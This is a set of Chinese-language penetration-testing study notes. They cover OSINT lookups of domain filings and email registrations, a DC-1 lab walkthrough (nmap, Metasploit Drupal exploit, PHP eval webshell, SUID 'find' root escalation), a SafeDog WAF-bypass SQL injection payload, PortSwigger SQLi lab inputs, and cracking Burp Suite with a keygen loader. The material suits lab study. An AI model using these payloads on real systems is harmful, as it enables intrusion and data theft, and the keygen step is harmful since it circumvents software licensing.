https://beian.miit.gov.cn/通过这个地址查看域名备案https://beian.miit.gov.cn/#/Integrated/index通过域名备案可以查到邮箱，姓名，主体，服务备案号，通过备案号可以查其他相关网站。通过备案号加上引号进行百度搜索

已知邮箱

https://www.reg007.com/通过这个网站搜索邮箱，手机号可以看到注册过的一些相关网页或者应用，不过比较鸡肋的是必须证明是本人进行查询，还需要发送验证码。你注册过哪些网站？一搜便知 - REG007已知邮箱可以查询到姓名，手机号，历史密码，身份证，户口本，淘宝记录。整体流程图：

靶机攻破

准备工作

1.准备好DC1靶机和kali linux虚拟机两台设。2.由于一开始不知道DC1靶机的ip地址，可以将两台设备调整为nat模式，对DC1进行查看物理地址并记录下来
DC1的mac地址：00:0C:29:0D:49:7C
3.kali linux虚拟机通过ifconfig找到当前的ip地址
etho：192.168.17.132
4.通过nmap端口扫描找到DC1的IP地址：namp -sn 192.168.17.132/24 “其中-sn”参数指定了 nmap 工具执行 “Ping Scan”，即使用 ICMP 回应来确定目标主机是否存活。

1
2

命令：namp -sn 192.168.17.132/24
得出DC1的IP：192.168.17.133

获取信息

1.通过此命令查看DC1的基本信息：nmap -sS 192.168.17.133 -A

2.通过此命令查看DC1的全端口信息：nmap -p- 192.168.17.133

3.确定版本：nmap -p 80 -sV 192.168.17.133,由于自己试过无法主机无法到达，因为两个虚拟机都选择的是nat模式所以无法互相拼通。

再在kali机上面打开浏览器搜索192.168.17.133:80,关键字是:Drupal Site ,用sql注入进行尝试发现没啥用处，邮箱注册发送也没用

4.进行目录扫描：dirsearch -u 192.168.17.133 -x 403，404 -t 50

在网页后面加上/robots.txt。这个文件是一个爬虫文件。robots.txt 是一个用于指导网络爬虫的文件。它是位于网站根目录下的一个文本文件，用于向搜索引擎和其他网络爬虫提供关于网站爬取规则的指示。当搜索引擎的爬虫访问一个网站时，它会首先查找并读取 robots.txt 文件。该文件中包含了一些指令，告诉爬虫哪些网页可以被爬取，哪些不可以。通过 robots.txt，网站管理员可以控制搜索引擎爬虫在访问网站时的行为，例如禁止爬虫访问某些特定的页面、目录或文件。

再去看一下/UPGRADE.txt可以发现Drupal是一个框架，当前版本是7.0，百度搜索一下，发现版本比较老，可能存在漏洞。

msf尝试进行攻击：

启动msf:msfconsole

搜索框架漏洞：search drupal

发现存在这些漏洞，一个个进行尝试，最后发现第二个能够成功。尝试用use 0会话没有创建成功，用use 2成功创建会话。

show options查看必须要设置的选项

set rhosts 192.168.17.133#这个ip是DC1的ip

run一下出现这个说明伪终端创建成功。

尝试提权：

shell一下，ls查看一下：

pwd当前位置，whoami我是谁

cat flag1.txt

CMS

CMS 是内容管理系统（Content Management System）的缩写。它是一种用于创建、编辑、管理和发布内容的软件系统或工具。一个 CMS 提供了一系列的功能和工具，使用户可以轻松地创建、组织和发布内容，无需编写代码或进行复杂的技术操作。它通常包括用户管理、内容编辑、模板设计、发布管理等功能。使用 CMS，用户可以创建和管理各种类型的网站，例如博客、新闻门户、企业网站、电子商务网站等。CMS 提供了易于使用的界面和工具，允许用户通过简单的操作来添加、编辑或删除页面内容、图像、视频、文章等，而无需涉及复杂的编程和设计知识。一些常见的 CMS 包括 WordPress、Drupal、Joomla 等，它们都是广泛用于构建和管理网站的流行软件系统。通过使用 CMS，用户能够方便地管理网站的内容，使网站的维护和更新更加高效和简单。

上传文件：

where curl #curl类似于一个命令行工具或者库

输入curl出现帮助手册说明存在。

curl www.baidu.com

在桌面新建一个1.php

1
2
3

<?php
@eval($_GET[cmd]);
?>

重新开一个cmd窗口输入python -m http.server 80#意思是说将当前目录设置为网站根目录。

http://192.168.17.132 -o 1.php

ls发现上传成功。

cat 1.php出现其他的内容说明上传的方式错了，上传了个下载连接地址。正确的方式是这样的：curl http://192.168.17.132/1.php -o 2.php

cat 2.php

成功之后调用系统命令执行函数。192.168.17.133/2.php?cmd=sytem(ls);

通过木马获取权限，这是一种办法。

短暂获取权限：

python加强一下shell权限：python -c “import pty;pty.spawn(‘/bin/bash’)”#使用交互shell
python -c “import pty;pty.spawn(‘/bin/bash’)”

find提权：find / -user root -perm -4000 -print 2>/dev/null#这里利用SUID进行提权，查看SUID的二进制可执行文件。
find / -user root -perm -4000 -print 2>/dev/null
解释：find 是一个命令，用于在文件系统中搜索文件或目录。/ 是搜索的起始点，表示从根目录开始搜索。-user root 是一个选项，表示搜索属主为 root 的文件或目录。-perm -4000 是另一个选项，表示搜索权限设置为 4000（八进制表示）的文件或目录。其中的 - 表示匹配减去指定权限后的结果，4000 则对应 SUID 权限位。-print 是一个选项，表示找到匹配的文件或目录时打印出它们的路径。最后的 2>/dev/null 是将搜索过程中产生的错误信息（标准错误输出）重定向到 /dev/null 设备中，以避免显示错误信息。

find / -name cron.php -exec “/bin/sh” ; #利用find获取root权限id查看当前的用户。

cd /root切换到root根目录ls 发现最终的flagcat theflnalfalg.txt 查看文件内容

安全狗的安装

1.在虚拟机win10浏览器的安全狗官网，链接：https://www.safedog.cn/ 在首页的免费安全产品下载网站安全狗。下载后先不要安装。
2.关闭小皮的Apache，加入一个新的Apache到系统服务中，管理员权限打开dos命令面板，进入phpstudy_pro\Extensions\Apache2.4.39\bin文件夹，输入以下命令

1

httpd.exe -k install -n apache2.4

3.安装完成后打开系统服务列表查看是否安装成功。win+r ，services.msc。

4.安全前先启动Apache2.4服务，点击安全狗安装包安装，安装目录自定义
5.用管理员权限启动安全狗。

WAF绕过

1.WAF（Web应用防火墙）是一种安全解决方案，旨在保护Web应用程序免受各种攻击，如SQL注入、跨站脚本（XSS）和命令执行等。然而，由于WAF通常基于正则表达式和预定义的规则集来检测攻击，因此存在被绕过的可能性。
2.WAF绕过方法总结，链接:
WAF绕过方法总结_51CTO博客_如何绕过waf
3.安装了安全狗后，以sqli的第1关为例
输入?id=1' union select,被安全狗的过滤规则检测到了

4.打开Yakit软件，把第一关链接192.168.2.2/sqli/Less/?id=1复制到Yakit内置浏览器，然后抓包。
5.点击Fuzz，然后在下图位置插入字典。

6.字典中添加如下内容

7.点击发送请求，1,2行数据报错，原因是字典中的空格没有编码。

8.给空格编码%20后，1，2行数据没有报错了。响应大小为5276说明被安全狗拦截了。4~8整个过程被称为模糊测试。

9.在12345处插入6位验证码

10.得到我们需要的payloads

11.把之前的12345换成00044
12.输入以下代码：
?id=0'union/*//*//*!00044select*/1,/*//*/!00044database*//*//*//*!00044()*/,3-- -
结果成功绕过安全狗：

SQL注入Oracle数据库

1.访问靶场网站，链接：https://portswigger.net/web-security/all-labs 注册并登录
2.第一关，右键翻译网页，溶液代表答案，然后访问实验室。

3.在地址栏输入以下代码：

1

filter?category=%27+OR+1=1--

成功注入，结果如下:

3.第二关，是SQL注入登录框 username填administrator’–，密码是随机的，填1

成功注入，结果如下

Burp的安装与使用

安装

1.下载并安装Burp抓包软件（半汉化版），官网链接：https://portswigger.net/burp
2.cmd打开这个路径
3.在命令窗口输入Java -vision确认java版本是java19
再输入java -jar burp-loader-keygen-2_1_06.jar然后会弹出下面的窗口

4.然后再双击汉化启动。

5.把左边的License复制到右边，点击下一步=>手动激活。

6.过程1：把右边内容复制到左边
过程2：把左边下方内容复制到右边下方
点击下一个，激活成功

使用

1.sqli第一关，用Burp抓包。依次点击Proxy–>intercept–>打开内置浏览器–>复制第一关的链接粘贴到内置浏览器–>HTTP history–>对应的数据包

2.用Burp爆破。右击数据包–>发送到repeat
3. 1-50迭代。右击数据包–>发送到intruder （intruder是爆破器 ）选择1–>添加

4.点击Payloads–>Payloads type选择Numbers–>1 50 1–>点击发送